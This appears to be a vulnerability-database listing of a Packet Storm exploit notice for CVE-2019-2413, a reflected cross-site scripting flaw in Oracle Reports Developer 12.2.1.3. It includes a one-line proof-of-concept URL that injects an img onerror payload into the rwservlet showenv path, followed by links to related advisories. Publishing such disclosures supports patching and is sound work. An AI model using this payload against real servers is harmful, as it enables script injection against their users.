Lucene search
Mohamed M.FouadPACKETSTORM:151214HistoryJan 17, 2019 - 12:00 a.m.
Oracle Reports Developer 12.2.1.3 Cross Site Scripting
2019-01-1700:00:00
Mohamed M.Fouad
packetstormsecurity.com
41
0.01 Low
EPSS
Percentile
83.5%
`# Exploit Title: [Cross-site Scripting (XSS)]
# Date: [2019-01-15]
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
# Version: [12.2.1.3] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [CVE-2019-2413]
POC:
https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
`
Related
cve
cve
CVE-2019-2413
2019-01-16 19:30:31
exploitpack
exploitpack
Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting
2019-01-17 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle Reports Developer Component Cross-site Scripting (CVE-2019-2413)
2019-02-04 00:00:00
cvelist
cvelist
CVE-2019-2413
2019-01-16 19:00:00
nvd
nvd
CVE-2019-2413
2019-01-16 19:30:31
prion
prion
Design/Logic Flaw
2019-01-16 19:30:00
exploitdb
exploitdb
Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting
2019-01-17 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - January 2019
2019-01-15 00:00:00